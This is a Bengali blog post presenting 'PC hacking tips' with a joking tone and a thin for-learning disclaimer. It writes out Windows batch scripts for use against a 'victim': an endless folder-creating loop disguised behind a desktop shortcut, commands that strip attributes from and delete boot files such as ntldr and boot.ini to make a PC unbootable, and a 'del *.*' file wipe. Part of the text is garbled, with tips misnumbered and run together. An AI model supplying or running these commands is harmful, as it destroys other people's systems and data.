আজ আবারও আরেকটি মজার পোষ্ট নিয়ে আপনাদের সামনে হাজির হয়েছি। কেমন আছেন? আশা করি মহান সৃষ্টিকর্তার অশেষ রহমতে খুবই ভাল আছেন। আজ আমি আপনাদের সাথে শেয়ার করব ৫টি জটিল পিসি হ্যাকিং টিপস। তবে একটু সর্তকতা, কখনও এই টিপসগুলো কারও ক্ষতির উদ্দেশ্যে ব্যবহার করবেন না। এগুলো শুধু জানার জন্য। আপনি যদি এগুলো সম্পর্কে জানেন তাহলে আপনি এর ফাঁদে পড়বেন না। তবে আর দেরি কেন চলেন তবে দেখা যাক কি হই...
১. একটি লিংক দিয়েই পিসি ক্যাস করান
মাত্র একটি লিংক দিয়ে আপনি যেকোনো একটি পিসিকে ক্র্যাস করান। এজন্য নিচের লিংকে ক্লিক করুন ও সাথে সাথে কাজ হয়ে যাবে…… হি হিহ হি হিহিহি। এর থেকে মুক্তি পেতে আপনার পিসি রির্ষ্টাট করতে হবে।
তবে সাবধান, লিংকে ক্লিক করবেন না, তাহল আপনার ব্রাউজার বা আপনার সিস্টেম ক্র্যাস হয়ে যেতে পারে।
২. এক মিনিটে ৩০০০ এর বেশি ফোল্ডার তৈরি করুন
- আপনার নোটপ্যাডটি ওপেন করুন।
- এবার নিচের কোড পেষ্ট করুন আর দেখুন কি হয়।
@echo off
:top
md %random%
goto top
- এবার ফাইলটিকে tech4fever.bat নামে সেভ করুন।
- এবার একটি ডেকস্টপে এর একটি শর্টকাট তৈরি করুন। ও আইকন নিচের মতো দিন বা আপনার ইচ্ছে...
- এবার যা পিসি সে এটা চালানেই হল। হি হি হি হিহিহিহিহ……………….
- একটি পিসিকে মাত্র কয়েক লাইনের কোড দিয়ে সারা জীবনের জন্য বন্ধ করে দিন। এজন্য নিচের কোডটি কপি করে নোটপ্যাডে পেষ্ট করুন। ৩. একটি পিসিকে চিরজীবনের মেরে ফেলুন@echo offattrib -r -s -h c:\autoexec.batdel c:\autoexec.batattrib -r -s -h c:\boot.inidel c:\boot.iniattrib -r -s -h c:\ntldrdel c:\ntldrattrib -r -s -h c:\windows\win.inidel c:\windows\win.iniএবার এটিকে tech4fever.bat নামে সেভ করুন। তবে এটাকে আপনি .bat বা .cmd তে সেভ করতে পারবেন। এবার এটি চালু করলেই হল। হি হিহ হিইহহিহি…………..৫. মাত্র ৬ অক্ষরের শব্দ দিয়ে সিস্টেমের সকল ফাইলকে করে দিন ছক্কাএবার নিচের কোড টি কপি করে নোট প্যাডে পেষ্ট করুন।del *.*এবার এটিকে tech4fever.bat নামে সেভ করুন। এটি চালু করার ৫ মিনেট পর আপনার ভিকটিমের সব সিস্টেম ফাইল একদম তাদের শ্বশুর বাড়ি চলে যাবে।আমার প্রিয় বন্ধুরা, আপনার এই পোস্টটি অপব্যবহার করবেন না। জাষ্ট এটি শিখার জন্য, তবে সর্তক থাকবেন যেন কেউ আপনার ক্ষতি করতে না পারে। আপনার মেইলে কেউ নোটপ্যাড আকারে কিছু পাঠানে তা অবশ্যই ভাল ভাবে চেক করে উক্ত ফাইলটি চালু করবেন, নতুবা আপনি নিজেরই বারটা বেজে যাবে…………………..সবাই অনেক ধন্যবাদ। ভাল থাকবেন আশা করি……..
0 কমেন্ট:
Post a Comment